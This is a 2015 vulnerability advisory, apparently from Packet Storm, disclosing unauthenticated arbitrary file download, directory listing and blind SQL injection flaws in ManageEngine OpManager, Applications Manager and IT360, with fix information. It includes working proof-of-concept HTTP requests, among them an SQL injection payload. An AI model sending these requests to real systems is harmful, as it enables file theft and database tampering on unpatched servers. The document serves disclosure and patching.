what you don't know can hurt you

ManageEngine File Download / Content Disclosure / SQL Injection

ManageEngine File Download / Content Disclosure / SQL Injection
Posted Jan 29, 2015
Authored by Pedro Ribeiro

ManageEngine OpManager, Applications Manager, and IT360 suffer from arbitrary file download, directory content disclosure, and blind SQL injection vulnerabilities.

tags | exploit, arbitrary, vulnerability, sql injection, info disclosure
MD5 | 7aea427606c71aefe920fb9e4aecca03

ManageEngine File Download / Content Disclosure / SQL Injection

Change Mirror Download
Hi,

This is part 12 of the ManageOwnage series. For previous parts, see [1].

This time we have an arbitrary file download, directory content
disclosure and blind SQL injection vulnerabilities in ManageEngine
OpManager, Applications Manager and IT360.

I've pushed two new Metasploit modules into the framework that exploit
the file download and the content disclosure [2], these should
hopefully be accepted soon.
The full advisory text is below, and as always you can get a copy from
my repo [3].

Regards,
Pedro

>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2014 / Last updated: 28/01/2014

>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."

"ManageEngine Applications Manager is a comprehensive application
monitoring software used to monitor heterogeneous business
applications such as web applications, application servers, web
servers, databases, network services, systems, virtual systems, cloud
resources, etc. It provides remote business management to the
applications or resources in the network. It is a powerful tool for
system and network administrators, helping them monitor any number of
applications or services running in the network without much manual
effort."

"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."


>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately
called FailServlet).
There are definitely more vulnerabilities than the ones identified
below - for example it is possible to hijack the failover operation
completely. The ones listed below as the easy ones to find and
exploit.


#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini


#2
Vulnerability: Information disclosure - list all files in a directory
and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\


#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a


>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.

For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.

These vulnerabilities remain UNFIXED in IT360.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
http://seclists.org/fulldisclosure/2015/Jan/2
http://seclists.org/fulldisclosure/2015/Jan/5

[2]
https://github.com/rapid7/metasploit-framework/pull/4658
https://github.com/rapid7/metasploit-framework/pull/4659

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close